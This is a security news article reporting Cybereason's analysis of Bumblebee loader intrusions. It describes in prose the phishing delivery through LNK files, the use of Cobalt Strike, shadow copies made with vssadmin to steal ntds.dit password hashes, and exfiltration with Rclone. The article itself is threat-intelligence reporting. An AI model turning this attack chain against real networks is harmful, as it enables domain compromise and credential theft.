Bumblebee attacks, from initial access to the compromise of Active Directory Services

Threat actors are using the Bumblebee loader to compromise Active Directory services as part of post-exploitation activities.

The Cybereason Global Security Operations Center (GSOC) Team analyzed a cyberattack that involved the Bumblebee Loader and detailed how the attackers were able to compromise the entire network.

Most Bumblebee infections started by users executing LNK files which use a system binary to load the malware. The malware is distributed through phishing messages using a malicious attachment or a link to the malicious archive containing Bumblebee.

After initial execution, Bumblebee was used to perform post-exploitation activities, including privilege escalation, reconnaissance, and credential theft. 

Threat actors conduct intensive reconnaissance activities and redirect the output of executed commands to files for exfiltration.

Bumblebee has been active since March 2022 when it was spotted by Google’s Threat Analysis Group (TAG), experts noticed that cybercriminal groups that were previously using the BazaLoader and IcedID as part of their malware campaigns switched to the Bumblebee loader.

“Cybereason GSOC has observed threat actors transitioning from BazarLoader, Trickbot, and IcedID to Bumblebee, which seems to be in active development and generally the loader of choice for many threat actors.” reads the analysis published by Cybereason. “Bumblebee operators use the Cobalt Strike framework throughout the attack. The threat actors use the obtained credentials to access Active Directory and make a copy of ntds.dit containing data for the entire Active Directory. Lastly, a domain administrator account is used to move laterally, create local user accounts, and exfiltrate data using Rclone software.”

In the attack analyzed by Cybereason, threat actors used stolen credentials of a highly privileged user to gain access to the Active Directory and compromise the target network.

“Bumblebee accesses the remote Active Directory machines using Windows Management Instrumentation command-line utility (WMIC) and creates a shadow copy using vssadmin command. In addition, the attacker steals the ntds.dit file from the domain controller. The ntds.dit file is a database that stores Active Directory data, including information about user objects, groups and group membership. The file also stores the password hashes for all users in the domain.” continues the analysis.

The experts noticed that the time it took between initial access and Active Directory compromise was less than two days.

GSOC experts warn that attacks involving Bumblebee must be treated as critical. The attack chain they analyzed allows threat actors to deliver their ransomware in the compromised networks. 

Follow me on Twitter: @securityaffairs and Facebook

[adrotate banner=”9″]

[adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, malware)

[adrotate banner=”5″]

[adrotate banner=”13″]